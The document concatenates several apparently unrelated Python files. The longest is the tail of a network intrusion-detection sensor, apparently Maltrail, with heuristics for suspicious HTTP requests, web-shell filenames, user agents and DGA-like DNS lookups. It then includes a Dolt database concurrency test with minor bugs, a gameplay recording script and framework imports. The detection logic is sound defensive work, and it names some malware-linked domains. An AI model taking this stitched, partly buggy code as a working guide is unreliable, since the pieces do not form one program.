_check_domain(host, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
elif config.USE_HEURISTICS and config.CHECK_MISSING_HOST:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, "%s%s" % (host, path), "missing host header (suspicious)", "(heuristic)"), packet)
index = tcp_data.find("\r\n\r\n")
if index >= 0:
post_data = tcp_data[index + 4:]
if config.USE_HEURISTICS and dst_port == 80 and path.startswith("http://") and not _check_domain_whitelisted(urlparse.urlparse(path).netloc.split(':')[0]):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, path, "potential proxy probe (suspicious)", "(heuristic)"), packet)
return
elif "://" in path:
url = path.split("://", 1)[1]
if '/' not in url:
url = "%s/" % url
host, path = url.split('/', 1)
if host.endswith(":80"):
host = host[:-3]
path = "/%s" % path
proxy_domain = host.split(':')[0]
_check_domain(proxy_domain, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
elif method == "CONNECT":
if '/' in path:
host, path = path.split('/', 1)
path = "/%s" % path
else:
host, path = path, '/'
if host.endswith(":80"):
host = host[:-3]
url = "%s%s" % (host, path)
proxy_domain = host.split(':')[0]
_check_domain(proxy_domain, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
else:
url = "%s%s" % (host, path)
if config.USE_HEURISTICS:
user_agent, result = None, None
first_index = tcp_data.find("\r\nUser-Agent:")
if first_index >= 0:
first_index = first_index + len("\r\nUser-Agent:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
user_agent = tcp_data[first_index:last_index]
user_agent = urllib.unquote(user_agent).strip()
if user_agent:
result = _result_cache.get(user_agent)
if result is None:
if not any(_ in user_agent for _ in WHITELIST_UA_KEYWORDS):
match = re.search(SUSPICIOUS_UA_REGEX, user_agent)
if match:
def _(value):
return value.replace('(', "\\(").replace(')', "\\)")
parts = user_agent.split(match.group(0), 1)
if len(parts) > 1 and parts[0] and parts[-1]:
result = _result_cache[user_agent] = "%s (%s)" % (_(match.group(0)), _(user_agent))
else:
result = _result_cache[user_agent] = _(match.group(0)).join(("(%s)" if part else "%s") % _(part) for part in parts)
if not result:
_result_cache[user_agent] = False
if result:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.UA, result, "user agent (suspicious)", "(heuristic)"), packet)
checks = [path.rstrip('/')]
if '?' in path:
checks.append(path.split('?')[0].rstrip('/'))
_ = os.path.splitext(checks[-1])
if _[1]:
checks.append(_[0])
if checks[-1].count('/') > 1:
checks.append(checks[-1][:checks[-1].rfind('/')])
checks.append(checks[0][checks[0].rfind('/'):].split('?')[0])
for check in filter(None, checks):
for _ in ("", host):
check = "%s%s" % (_, check)
if check in trails:
parts = url.split(check)
other = ("(%s)" % _ if _ else _ for _ in parts)
trail = check.join(other)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, trails[check][0], trails[check][1]))
return
if config.USE_HEURISTICS:
unquoted_path = urllib.unquote(path)
unquoted_post_data = urllib.unquote(post_data or "")
for char in SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS:
replacement = SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS[char]
path = path.replace(char, replacement)
if post_data:
post_data = post_data.replace(char, replacement)
if not _check_domain_whitelisted(host):
if not any(_ in unquoted_path.lower() for _ in WHITELIST_HTTP_REQUEST_PATHS):
if any(_ in unquoted_path for _ in SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION):
found = _result_cache.get(unquoted_path)
if found is None:
for desc, regex in SUSPICIOUS_HTTP_REQUEST_REGEXES:
if re.search(regex, unquoted_path, re.I | re.DOTALL):
found = desc
break
_result_cache[unquoted_path] = found or ""
if found:
trail = "%s(%s)" % (host, path)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "%s (suspicious)" % found, "(heuristic)"), packet)
return
if any(_ in unquoted_post_data for _ in SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION):
found = _result_cache.get(unquoted_post_data)
if found is None:
for desc, regex in SUSPICIOUS_HTTP_REQUEST_REGEXES:
if re.search(regex, unquoted_post_data, re.I | re.DOTALL):
found = desc
break
_result_cache[unquoted_post_data] = found or ""
if found:
trail = "%s(%s \(%s %s\))" % (host, path, method, post_data.strip())
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "%s (suspicious)" % found, "(heuristic)"), packet)
return
if '.' in path:
_ = urlparse.urlparse("http://%s" % url) # dummy scheme
path = path.lower()
filename = _.path.split('/')[-1]
name, extension = os.path.splitext(filename)
trail = "%s(%s)" % (host, path)
if extension and extension in SUSPICIOUS_DIRECT_DOWNLOAD_EXTENSIONS and not any(_ in path for _ in WHITELIST_DIRECT_DOWNLOAD_KEYWORDS) and '=' not in _.query and len(name) < 10:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "direct %s download (suspicious)" % extension, "(heuristic)"), packet)
elif filename in WEB_SHELLS:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "potential web shell (suspicious)", "(heuristic)"), packet)
else:
for desc, regex in SUSPICIOUS_HTTP_PATH_REGEXES:
if re.search(regex, filename, re.I):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "%s (suspicious)" % desc, "(heuristic)"), packet)
break
elif protocol == socket.IPPROTO_UDP: # UDP
_ = ip_data[iph_length:iph_length + 4]
if len(_) < 4:
return
src_port, dst_port = struct.unpack("!HH", _)
_ = _last_udp
_last_udp = (sec, src_ip, src_port, dst_ip, dst_port)
if _ == _last_udp: # skip bursts
return
if src_port != 53 and dst_port != 53: # not DNS
if dst_ip in trails:
trail = dst_ip
elif src_ip in trails:
trail = src_ip
else:
trail = None
if trail:
_ = _last_logged_udp
_last_logged_udp = _last_udp
if _ != _last_logged_udp:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, trail, trails[trail][0], trails[trail][1]), packet)
else:
dns_data = ip_data[iph_length + 8:]
# Reference: http://www.ccs.neu.edu/home/amislove/teaching/cs4700/fall09/handouts/project1-primer.pdf
if len(dns_data) > 6:
qdcount = struct.unpack("!H", dns_data[4:6])[0]
if qdcount > 0:
offset = 12
query = ""
while len(dns_data) > offset:
length = ord(dns_data[offset])
if not length:
query = query[:-1]
break
query += dns_data[offset + 1:offset + length + 1] + '.'
offset += length + 1
query = query.lower()
if not query or '.' not in query or not all(_ in VALID_DNS_CHARS for _ in query) or any(_ in query for _ in (".intranet.",)) or any(query.endswith(_) for _ in IGNORE_DNS_QUERY_SUFFIXES):
return
parts = query.split('.')
if ord(dns_data[2]) == 0x01: # standard query
type_, class_ = struct.unpack("!HH", dns_data[offset + 1:offset + 5])
if len(parts) > 2:
if len(parts) > 3 and len(parts[-2]) <= 3:
domain = '.'.join(parts[-3:])
else:
domain = '.'.join(parts[-2:])
if not _check_domain_whitelisted(domain): # e.g. <hash>.hashserver.cs.trendmicro.com
if (sec - (_subdomains_sec or 0)) > DAILY_SECS:
_subdomains.clear()
_dns_exhausted_domains.clear()
_subdomains_sec = sec
subdomains = _subdomains.get(domain)
if not subdomains:
subdomains = _subdomains[domain] = set()
if len(subdomains) < DNS_EXHAUSTION_THRESHOLD:
subdomains.add('.'.join(parts[:-2]))
else:
if (sec - (_last_dns_exhaustion or 0)) > 60:
trail = "(%s).%s" % ('.'.join(parts[:-2]), '.'.join(parts[-2:]))
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "potential dns exhaustion (suspicious)", "(heuristic)"), packet)
_dns_exhausted_domains.add(domain)
_last_dns_exhaustion = sec
return
# Reference: http://en.wikipedia.org/wiki/List_of_DNS_record_types
if type_ not in (12, 28) and class_ == 1: # Type not in (PTR, AAAA), Class IN
if dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, "%s (%s)" % (dst_ip, query), trails[dst_ip][0], trails[dst_ip][1]), packet)
elif src_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet)
_check_domain(query, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, packet)
elif config.USE_HEURISTICS:
if ord(dns_data[2]) & 0x80: # standard response
if ord(dns_data[3]) == 0x80: # recursion available, no error
_ = offset + 5
try:
while _ < len(dns_data):
if ord(dns_data[_]) & 0xc0 != 0 and dns_data[_ + 2] == "\00" and dns_data[_ + 3] == "\x01": # Type A
break
else:
_ += 12 + struct.unpack("!H", dns_data[_ + 10: _ + 12])[0]
_ = dns_data[_ + 12:_ + 16]
if _:
answer = socket.inet_ntoa(_)
if answer in trails:
_ = trails[answer]
if "sinkhole" in _[0]:
trail = "(%s).%s" % ('.'.join(parts[:-1]), '.'.join(parts[-1:]))
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "sinkholed by %s (malware)" % _[0].split(" ")[1], "(heuristic)"), packet) # (e.g. kitro.pl, devomchart.com, jebena.ananikolic.su, vuvet.cn)
elif "parking" in _[0]:
trail = "(%s).%s" % ('.'.join(parts[:-1]), '.'.join(parts[-1:]))
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "parked site (suspicious)", "(heuristic)"), packet)
except IndexError:
pass
elif ord(dns_data[3]) == 0x83: # recursion available, no such name
if '.'.join(parts[-2:]) not in _dns_exhausted_domains and not _check_domain_whitelisted(query) and not _check_domain_member(query, trails):
if parts[-1].isdigit():
return
if not (len(parts) > 4 and all(_.isdigit() and int(_) < 256 for _ in parts[:4])): # generic check for DNSBL IP lookups
for _ in filter(None, (query, "*.%s" % '.'.join(parts[-2:]) if query.count('.') > 1 else None)):
if _ not in NO_SUCH_NAME_COUNTERS or NO_SUCH_NAME_COUNTERS[_][0] != sec / 3600:
NO_SUCH_NAME_COUNTERS[_] = [sec / 3600, 1, set()]
else:
NO_SUCH_NAME_COUNTERS[_][1] += 1
NO_SUCH_NAME_COUNTERS[_][2].add(query)
if NO_SUCH_NAME_COUNTERS[_][1] > NO_SUCH_NAME_PER_HOUR_THRESHOLD:
if _.startswith("*."):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, "%s%s" % ("(%s)" % ','.join(item.replace(_[1:], "") for item in NO_SUCH_NAME_COUNTERS[_][2]), _[1:]), "excessive no such domain (suspicious)", "(heuristic)"), packet)
for item in NO_SUCH_NAME_COUNTERS[_][2]:
try:
del NO_SUCH_NAME_COUNTERS[item]
except KeyError:
pass
else:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, _, "excessive no such domain (suspicious)", "(heuristic)"), packet)
try:
del NO_SUCH_NAME_COUNTERS[_]
except KeyError:
pass
break
if len(parts) > 2:
part = parts[0] if parts[0] != "www" else parts[1]
trail = "(%s).%s" % ('.'.join(parts[:-2]), '.'.join(parts[-2:]))
elif len(parts) == 2:
part = parts[0]
trail = "(%s).%s" % (parts[0], parts[1])
else:
part = query
trail = query
if part and '-' not in part:
result = _result_cache.get(part)
if result is None:
# Reference: https://github.com/exp0se/dga_detector
probabilities = (float(part.count(c)) / len(part) for c in set(_ for _ in part))
entropy = -sum(p * math.log(p) / math.log(2.0) for p in probabilities)
if entropy > SUSPICIOUS_DOMAIN_ENTROPY_THRESHOLD:
result = "entropy threshold no such domain (suspicious)"
if not result:
if sum(_ in CONSONANTS for _ in part) > SUSPICIOUS_DOMAIN_CONSONANT_THRESHOLD:
result = "consonant threshold no such domain (suspicious)"
_result_cache[part] = result or False
if result:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, result, "(heuristic)"), packet)
elif protocol in IPPROTO_LUT: # non-TCP/UDP (e.g. ICMP)
if protocol == socket.IPPROTO_ICMP:
if ord(ip_data[iph_length]) != 0x08: # Non-echo request
return
elif protocol == socket.IPPROTO_ICMPV6:
if ord(ip_data[iph_length]) != 0x80: # Non-echo request
return
if dst_ip in trails:
log_event((sec, usec, src_ip, '-', dst_ip, '-', IPPROTO_LUT[protocol], TRAIL.IP, dst_ip, trails[dst_ip][0], trails[dst_ip][1]), packet)
elif src_ip in trails:
log_event((sec, usec, src_ip, '-', dst_ip, '-', IPPROTO_LUT[protocol], TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet)
except struct.error:
pass
except Exception:
if config.SHOW_DEBUG:
traceback.print_exc()
def init():
"""
Performs sensor initialization
"""
global _multiprocessing
try:
import multiprocessing
if config.PROCESS_COUNT > 1:
_multiprocessing = multiprocessing
except (ImportError, OSError, NotImplementedError):
pass
def update_timer():
retries = 0
while retries < CHECK_CONNECTION_MAX_RETRIES and not check_connection():
sys.stdout.write("[!] can't update because of lack of Internet connection (waiting..." if not retries else '.')
sys.stdout.flush()
time.sleep(10)
retries += 1
if retries:
print(")")
if retries == CHECK_CONNECTION_MAX_RETRIES:
print("[x] going to continue without online update")
_ = update_trails(offline=True)
else:
_ = update_trails(server=config.UPDATE_SERVER)
update_ipcat()
if _:
trails.clear()
trails.update(_)
elif not trails:
trails.update(load_trails())
thread = threading.Timer(config.UPDATE_PERIOD, update_timer)
thread.daemon = True
thread.start()
create_log_directory()
get_error_log_handle()
check_memory()
update_timer()
if check_sudo() is False:
exit("[!] please run '%s' with sudo/Administrator privileges" % __file__)
if config.plugins:
config.plugin_functions = []
for plugin in re.split(r"[,;]", config.plugins):
plugin = plugin.strip()
found = False
for _ in (plugin, os.path.join("plugins", plugin), os.path.join("plugins", "%s.py" % plugin)):
if os.path.isfile(_):
plugin = _
found = True
break
if not found:
exit("[!] plugin script '%s' not found" % plugin)
else:
dirname, filename = os.path.split(plugin)
dirname = os.path.abspath(dirname)
if not os.path.exists(os.path.join(dirname, '__init__.py')):
exit("[!] empty file '__init__.py' required inside directory '%s'" % dirname)
if not filename.endswith(".py"):
exit("[!] plugin script '%s' should have an extension '.py'" % filename)
if dirname not in sys.path:
sys.path.insert(0, dirname)
try:
module = __import__(filename[:-3].encode(sys.getfilesystemencoding()))
except (ImportError, SyntaxError), msg:
exit("[!] unable to import plugin script '%s' (%s)" % (filename, msg))
found = False
for name, function in inspect.getmembers(module, inspect.isfunction):
if name == "plugin" and not set(inspect.getargspec(function).args) & set(("event_tuple', 'packet")):
found = True
config.plugin_functions.append(function)
function.func_name = module.__name__
if not found:
exit("[!] missing function 'plugin(event_tuple, packet)' in plugin script '%s'" % filename)
if config.pcap_file:
_caps.append(pcapy.open_offline(config.pcap_file))
else:
interfaces = set(_.strip() for _ in config.MONITOR_INTERFACE.split(','))
if (config.MONITOR_INTERFACE or "").lower() == "any":
if subprocess.mswindows or "any" not in pcapy.findalldevs():
print("[x] virtual interface 'any' missing. Replacing it with all interface names")
interfaces = pcapy.findalldevs()
else:
print("[?] in case of any problems with packet capture on virtual interface 'any', please put all monitoring interfaces to promiscuous mode manually (e.g. 'sudo ifconfig eth0 promisc')")
for interface in interfaces:
if interface.lower() != "any" and interface not in pcapy.findalldevs():
hint = "[?] available interfaces: '%s'" % ",".join(pcapy.findalldevs())
exit("[!] interface '%s' not found\n%s" % (interface, hint))
print("[i] opening interface '%s'" % interface)
try:
_caps.append(pcapy.open_live(interface, SNAP_LEN, True, CAPTURE_TIMEOUT))
except (socket.error, pcapy.PcapError):
if "permitted" in str(sys.exc_info()[1]):
exit("[!] please run '%s' with sudo/Administrator privileges" % __file__)
elif "No such device" in str(sys.exc_info()[1]):
exit("[!] no such device '%s'" % interface)
else:
raise
if config.LOG_SERVER and not len(config.LOG_SERVER.split(':')) == 2:
exit("[!] invalid configuration value for 'LOG_SERVER' ('%s')" % config.LOG_SERVER)
if config.SYSLOG_SERVER and not len(config.SYSLOG_SERVER.split(':')) == 2:
exit("[!] invalid configuration value for 'SYSLOG_SERVER' ('%s')" % config.SYSLOG_SERVER)
if config.CAPTURE_FILTER:
print("[i] setting capture filter '%s'" % config.CAPTURE_FILTER)
for _cap in _caps:
_cap.setfilter(config.CAPTURE_FILTER)
if _multiprocessing:
_init_multiprocessing()
if not subprocess.mswindows and not config.DISABLE_CPU_AFFINITY:
try:
try:
mod = int(subprocess.check_output("grep -c ^processor /proc/cpuinfo", stderr=subprocess.STDOUT, shell=True).strip())
used = subprocess.check_output("for pid in $(ps aux | grep python | grep sensor.py | grep -E -o 'root[ ]*[0-9]*' | tr -d '[:alpha:] '); do schedtool $pid; done | grep -E -o 'AFFINITY .*' | cut -d ' ' -f 2 | grep -v 0xf", stderr=subprocess.STDOUT, shell=True).strip().split('\n')
max_used = max(int(_, 16) for _ in used)
affinity = max(1, (max_used << 1) % 2 ** mod)
except:
affinity = 1
p = subprocess.Popen("schedtool -n -2 -M 2 -p 10 -a 0x%02x %d" % (affinity, os.getpid()), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
_, stderr = p.communicate()
if "not found" in stderr:
msg, _ = "[?] please install 'schedtool' for better CPU scheduling", platform.linux_distribution()[0].lower()
for distro, install in {("fedora", "centos"): "sudo yum install schedtool", ("debian", "ubuntu"): "sudo apt-get install schedtool"}.items():
if _ in distro:
msg += " (e.g. '%s')" % install
break
print(msg)
except:
pass
def _init_multiprocessing():
"""
Inits worker processes used in multiprocessing mode
"""
global _buffer
global _n
if _multiprocessing:
print("[i] preparing capture buffer...")
try:
_buffer = mmap.mmap(-1, config.CAPTURE_BUFFER) # http://www.alexonlinux.com/direct-io-in-python
_ = "\x00" * MMAP_ZFILL_CHUNK_LENGTH
for i in xrange(config.CAPTURE_BUFFER / MMAP_ZFILL_CHUNK_LENGTH):
_buffer.write(_)
_buffer.seek(0)
except KeyboardInterrupt:
raise
except:
exit("[!] unable to allocate network capture buffer. Please adjust value of 'CAPTURE_BUFFER'")
print("[i] creating %d more processes (out of total %d)" % (config.PROCESS_COUNT - 1, config.PROCESS_COUNT))
_n = _multiprocessing.Value('L', lock=False)
for i in xrange(config.PROCESS_COUNT - 1):
process = _multiprocessing.Process(target=worker, name=str(i), args=(_buffer, _n, i, config.PROCESS_COUNT - 1, _process_packet))
process.daemon = True
process.start()
def monitor():
"""
Sniffs/monitors given capturing interface
"""
print("[o] running...")
def packet_handler(datalink, header, packet):
global _count
ip_offset = None
dlt_offset = DLT_OFFSETS[datalink]
try:
if datalink == pcapy.DLT_RAW:
ip_offset = dlt_offset
elif datalink == pcapy.DLT_PPP:
if packet[2:4] in ("\x00\x21", "\x00\x57"): # (IPv4, IPv6)
ip_offset = dlt_offset
elif dlt_offset >= 2:
if packet[dlt_offset - 2:dlt_offset] == "\x81\x00": # VLAN
dlt_offset += 4
if packet[dlt_offset - 2:dlt_offset] in ("\x08\x00", "\x86\xdd"): # (IPv4, IPv6)
ip_offset = dlt_offset
except IndexError:
pass
if ip_offset is None:
return
try:
sec, usec = header.getts()
if _multiprocessing:
if _locks.count:
_locks.count.acquire()
write_block(_buffer, _count, struct.pack("=III", sec, usec, ip_offset) + packet)
_n.value = _count = _count + 1
if _locks.count:
_locks.count.release()
else:
_process_packet(packet, sec, usec, ip_offset)
except socket.timeout:
pass
try:
def _(_cap):
datalink = _cap.datalink()
while True:
success = False
try:
(header, packet) = _cap.next()
if header is not None:
success = True
packet_handler(datalink, header, packet)
elif config.pcap_file:
_quit.set()
break
except (pcapy.PcapError, socket.timeout):
pass
if not success:
time.sleep(REGULAR_SENSOR_SLEEP_TIME)
if len(_caps) > 1:
if _multiprocessing:
_locks.count = threading.Lock()
_locks.connect_sec = threading.Lock()
for _cap in _caps:
threading.Thread(target=_, args=(_cap,)).start()
while _caps and not _quit.is_set():
time.sleep(1)
print("[i] all capturing interfaces closed")
except SystemError, ex:
if "error return without" in str(ex):
print("\r[x] stopping (Ctrl-C pressed)")
else:
raise
except KeyboardInterrupt:
print("\r[x] stopping (Ctrl-C pressed)")
finally:
print("\r[i] please wait...")
if _multiprocessing:
try:
for _ in xrange(config.PROCESS_COUNT - 1):
write_block(_buffer, _n.value, "", BLOCK_MARKER.END)
_n.value = _n.value + 1
while _multiprocessing.active_children():
time.sleep(REGULAR_SENSOR_SLEEP_TIME)
except KeyboardInterrupt:
pass
def main():
print("%s (sensor) #v%s\n" % (NAME, VERSION))
parser = optparse.OptionParser(version=VERSION)
parser.add_option("-c", dest="config_file", default=CONFIG_FILE, help="configuration file (default: '%s')" % os.path.split(CONFIG_FILE)[-1])
parser.add_option("-i", dest="pcap_file", help="open pcap file for offline analysis")
parser.add_option("-p", dest="plugins", help="plugin(s) to be used per event")
parser.add_option("--console", dest="console", action="store_true", help="print events to console (too)")
parser.add_option("--debug", dest="debug", action="store_true", help=optparse.SUPPRESS_HELP)
options, _ = parser.parse_args()
if not check_sudo():
exit("[!] please run '%s' with sudo/Administrator privileges" % __file__)
read_config(options.config_file)
for option in dir(options):
if isinstance(getattr(options, option), (basestring, bool)) and not option.startswith('_'):
config[option] = getattr(options, option)
if options.debug:
config.console = True
config.PROCESS_COUNT = 1
config.SHOW_DEBUG = True
if options.pcap_file:
if not os.path.isfile(options.pcap_file):
exit("[!] missing pcap file '%s'" % options.pcap_file)
else:
print("[i] using pcap file '%s'" % options.pcap_file)
try:
init()
monitor()
except KeyboardInterrupt:
print("\r[x] stopping (Ctrl-C pressed)")
if __name__ == "__main__":
show_final = True
try:
main()
except SystemExit, ex:
show_final = False
if not isinstance(getattr(ex, "message"), int):
print(ex)
except IOError:
show_final = False
log_error("\n\n[!] session abruptly terminated\n[?] (hint: \"https://stackoverflow.com/a/20997655\")")
except Exception:
msg = "\r[!] unhandled exception occurred ('%s')" % sys.exc_info()[1]
msg += "\n[x] please report the following details at 'https://github.com/stamparm/maltrail/issues':\n---\n'%s'\n---" % traceback.format_exc()
log_error("\n\n%s" % msg.replace("\r", ""))
print(msg)
finally:
if show_final:
print("[i] finished")
os._exit(0)
|
server_multiclient_test.py
|
import os
import sys
from queue import Queue
from threading import Thread
from helper.pytest import DoltConnection
# Utility functions
def print_err(e):
print(e, file=sys.stderr)
def query(dc, query_str):
return dc.query(query_str, False)
def query_with_expected_error(dc, non_error_msg , query_str):
try:
dc.query(query_str, False)
raise Exception(non_error_msg)
except:
pass
def row(pk, c1, c2):
return {"pk":str(pk),"c1":str(c1),"c2":str(c2)}
UPDATE_BRANCH_FAIL_MSG = "Failed to update branch"
def commit_and_update_branch(dc, commit_message, expected_hashes, branch_name):
expected_hash = "("
for i, eh in enumerate(expected_hashes):
if i != 0:
expected_hash += " or "
expected_hash += "hash = %s" % eh
expected_hash += ")"
query_str = 'UPDATE dolt_branches SET hash = Commit("%s") WHERE name = "%s" AND %s' % (commit_message, branch_name, expected_hash)
_, row_count = query(dc, query_str)
if row_count != 1:
raise Exception(UPDATE_BRANCH_FAIL_MSG)
query(dc, 'SET @@repo1_head=HASHOF("%s");' % branch_name)
def query_and_test_results(dc, query_str, expected):
results, _ = query(dc, query_str)
if results != expected:
raise Exception("Unexpected results for query:\n\t%s\nExpected:\n\t%s\nActual:\n\t%s" % (query_str, str(), str(results)))
def resolve_theirs(dc):
query_str = "REPLACE INTO test (pk, c1, c2) SELECT their_pk, their_c1, their_c2 FROM dolt_conflicts_test WHERE their_pk IS NOT NULL;"
query(dc, query_str)
query_str = """DELETE FROM test WHERE pk in (
SELECT base_pk FROM dolt_conflicts_test WHERE their_pk IS NULL
);"""
query(dc, query_str)
query(dc, "DELETE FROM dolt_conflicts_test")
def create_branch(dc, branch_name):
query_str = 'INSERT INTO dolt_branches (name, hash) VALUES ("%s", @@repo1_head);' % branch_name
_, row_count = query(dc, query_str)
if row_count != 1:
raise Exception("Failed to create branch")
# work functions
def connect(dc):
dc.connect()
def create_tables(dc):
query(dc, 'SET @@repo1_head=HASHOF("master");')
query(dc, """
CREATE TABLE test (
pk INT NOT NULL,
c1 INT,
c2 INT,
PRIMARY KEY(pk));""")
commit_and_update_branch(dc, "Created tables", ["@@repo1_head"], "master")
query_and_test_results(dc, "SHOW TABLES;", [{"Table": "test"}])
def duplicate_table_create(dc):
query(dc, 'SET @@repo1_head=HASHOF("master");')
query_with_expected_error(dc, "Should have failed creating duplicate table", """
CREATE TABLE test (
pk INT NOT NULL,
c1 INT,
c2 INT,
PRIMARY KEY(pk));""")
def seed_master(dc):
query(dc, 'SET @@repo1_head=HASHOF("master");')
_, row_count = query(dc, 'INSERT INTO test VALUES (0,0,0),(1,1,1),(2,2,2)')
if row_count != 3:
raise Exception("Failed to update rows")
commit_and_update_branch(dc, "Seeded initial data", ["@@repo1_head"], "master")
expected = [row(0,0,0), row(1,1,1), row(2,2,2)]
query_and_test_results(dc, "SELECT pk, c1, c2 FROM test ORDER BY pk", expected)
def modify_pk0_on_master_and_commit(dc):
query(dc, 'SET @@repo1_head=HASHOF("master");')
query(dc, "UPDATE test SET c1=1 WHERE pk=0;")
commit_and_update_branch(dc, "set c1 to 1", ["@@repo1_head"], "master")
def modify_pk0_on_master_no_commit(dc):
query(dc, 'SET @@repo1_head=HASHOF("master");')
query(dc, "UPDATE test SET c1=2 WHERE pk=0")
def fail_to_commit(dc):
try:
commit_and_update_branch(dc, "Created tables", ["@@repo1_head"], "master")
raise Exception("Failed to fail commit")
except Exception as e:
if str(e) != UPDATE_BRANCH_FAIL_MSG:
raise e
def commit_to_feature(dc):
create_branch(dc, "feature")
commit_and_update_branch(dc, "set c1 to 2", ["@@repo1_head"], "feature")
def merge_resolve_commit(dc):
query(dc, 'SET @@repo1_head=Merge("master");')
query_and_test_results(dc, "SELECT * from dolt_conflicts;", [{"table": "test", "num_conflicts": "1"}])
resolve_theirs(dc)
expected = [row(0,1,0), row(1,1,1), row(2,2,2)]
query_and_test_results(dc, "SELECT pk, c1, c2 FROM test ORDER BY pk", expected)
commit_and_update_branch(dc, "resolved conflicts", ['HASHOF("HEAD^1")', 'HASHOF("HEAD^2")'], "master")
# test script
MAX_SIMULTANEOUS_CONNECTIONS = 2
PORT_STR = sys.argv[1]
CONNECTIONS = [None]*MAX_SIMULTANEOUS_CONNECTIONS
for i in range(MAX_SIMULTANEOUS_CONNECTIONS):
CONNECTIONS[i] = DoltConnection(port=int(PORT_STR), database="repo1", user='dolt', auto_commit=False)
WORK_QUEUE = Queue()
# work item run by workers
class WorkItem(object):
def __init__(self, dc, *work_funcs):
self.dc = dc
self.work_funcs = work_funcs
self.exception = None
# worker thread function
def worker():
while True:
try:
item = WORK_QUEUE.get()
for work_func in item.work_funcs:
work_func(item.dc)
WORK_QUEUE.task_done()
except Exception as e:
work_item.exception = e
WORK_QUEUE.task_done()
# start the worker threads
for i in range(MAX_SIMULTANEOUS_CONNECTIONS):
t = Thread(target=worker)
t.daemon = True
t.start()
# This defines the actual test script. Each stage in the script has a list of work items. Each work item
# in a stage should have a different connection associated with it. Each connections work is done in parallel
# each of the work functions for a connection is executed in order.
work_item_stages = [
[WorkItem(CONNECTIONS[0], connect, create_tables)],
[WorkItem(CONNECTIONS[0], seed_master), WorkItem(CONNECTIONS[1], connect, duplicate_table_create)],
[WorkItem(CONNECTIONS[0], modify_pk0_on_master_and_commit), WorkItem(CONNECTIONS[1], modify_pk0_on_master_no_commit)],
[WorkItem(CONNECTIONS[1], fail_to_commit, commit_to_feature, merge_resolve_commit)]
]
# Loop through the work item stages executing each stage by sending the work items for the stage to the worker threads
# and then waiting for all of them to finish before moving on to the next one. Checks for an error after every stage.
for stage, work_items in enumerate(work_item_stages):
print("Running stage %d / %d" % (stage,len(work_item_stages)))
for work_item in work_items:
WORK_QUEUE.put(work_item)
WORK_QUEUE.join()
for work_item in work_items:
if work_item.exception is not None:
print_err(work_item.exception)
sys.exit(1)
|
sekiro_stream_monitor_healthbars.py
|
import os
import subprocess
import shutil
from threading import Thread, Event
from listeners import create_mouse_listener, create_keyboard_listener
# from collect_episodes import *
from handlers import audiohandler, videohandler
if __name__ == "__main__":
# if os.path.exists('episodes'):
# shutil.rmtree('episodes')
# else:
# os.mkdir('episodes')
filename = "sekiro_output3"
event = Event()
episodes_available = [int(item) for item in os.listdir('episodes') if os.path.isdir(os.path.join('episodes', item))]
if episodes_available:
next_episode = max(episodes_available) + 1
else:
next_episode = 0
os.mkdir('episodes/' + str(next_episode))
episode_path = 'episodes/' + str(next_episode)
# print('wait')
# time.sleep(3.0)
# print('started')
# You can disable recording audio (currently can not found a way to sync it properly)
audio_thread = Thread(target=audiohandler, args=(filename, event, episode_path))
video_thread = Thread(target=videohandler, args=(filename, event, episode_path))
keyboard_listener = create_keyboard_listener()
mouse_listener = create_mouse_listener()
keyboard_listener.start()
mouse_listener.start()
audio_thread.start()
video_thread.start()
audio_thread.join()
video_thread.join()
while True:
if event.isSet():
# mouse and keyboard listeners will be stopped at this point
break
merge_into_movie = f'ffmpeg -y -i {filename}.avi -i {filename}.wav -c copy {filename}.mkv'
p = subprocess.Popen(merge_into_movie)
output, _ = p.communicate()
print(output)
os.remove(f'{filename}.avi')
os.remove(f'{filename}.wav')
|
framework.py
|
#!/usr/bin/env python3
from __future__ import print_function
import gc
import logging
import sys
import os
import select
import signal
import subprocess
import unittest
import tempfile
import time
import faulthandler
import random
import copy
import psutil
import platform
from collections import deque
from threading import Thread, Event
from inspect import getdoc, isclass
from traceback import format_exception
from logging import FileHandler, DEBUG, Formatter
from enum import Enum
import scapy.compat
from scapy.packet import Raw
